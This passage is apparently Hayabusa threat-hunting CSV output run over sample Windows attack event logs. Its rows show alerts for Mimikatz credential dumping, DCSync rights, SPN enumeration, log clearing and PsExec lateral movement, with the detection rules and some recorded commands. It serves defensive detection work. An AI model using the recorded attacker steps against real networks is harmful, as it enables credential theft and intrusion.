@""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true 
/low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.456 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\cl.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.667 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\VCTIP.EXE"" : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\vctip.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: 
technique_id=T1015,technique_name=Accessibility Features : Command: setspn -T offsec -Q */* : Path: C:\Windows\System32\setspn.exe : User: OFFSEC\admmig : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx +2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,medium,Possible SPN Enumeration,,rules/sigma/process_creation/win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx +2021-02-03 00:37:59.991 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx +2021-02-03 00:37:59.993 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx +2021-02-03 00:38:31.989 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx +2021-02-03 00:38:31.995 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx +2021-02-08 21:03:02.776 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account 
manipulation/ID4738-User set with reversible psw encryption.evtx +2021-02-08 21:06:15.608 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Use only Kerberos DES encryption types.evtx +2021-02-08 21:06:53.407 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Do not require Kerberos preauthentication.evtx +2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx +2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx +2021-02-23 07:35:11.993 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx +2021-02-23 07:35:20.786 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx +2021-02-23 08:07:21.231 
+09:00,jump01.offsec.lan,59,informational,Bits Job Creation,Job Title: hackingarticles : URL: https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx +2021-03-16 03:49:21.017 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:49:23.184 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: ab170ec9.png : URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:52:31.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eBRSG.img?w=100&h=100&m=6&tilesize=medium&x=1788&y=885&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:52:33.804 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:53:18.009 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:53:51.796 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eC0p1.img?w=100&h=100&m=6&tilesize=medium&x=1964&y=1240&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:53:52.751 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:54:15.647 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: efc1a28b.png : URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:55:38.049 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe : URL: http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 
+2021-03-16 04:01:32.985 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe : URL: http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx +2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx +2021-03-27 01:17:29.210 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Credential Dumping Tools Service Execution,,rules/sigma/builtin/security/win_security_mal_creddumper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:36:00.106 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential 
dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:59:24.880 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx +2021-03-27 01:59:24.892 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx +2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:00.305 +09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:00.384 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\user03 : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The 
Hash Sysmon and Security.evtx +2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 18:27:51.181 +09:00,jump01.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx +2021-04-21 18:40:32.342 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56661 : LogonID: 0x1375fbd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 
10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: PSEXESVC.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: PSEXESVC.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.347 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56662 : LogonID: 0x1375fd8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56663 : LogonID: 0x1375ff5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin 
Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56664 : LogonID: 0x1376003,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.360 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56666 : LogonID: 0x1376020,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.362 +09:00,srvdefender01.offsec.lan,4674,critical,SCM Database Privileged Operation,,rules/sigma/builtin/security/win_scm_database_privileged_operation.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec 
remote execution + admin share.evtx" +2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: cmd.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: cmd.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.528 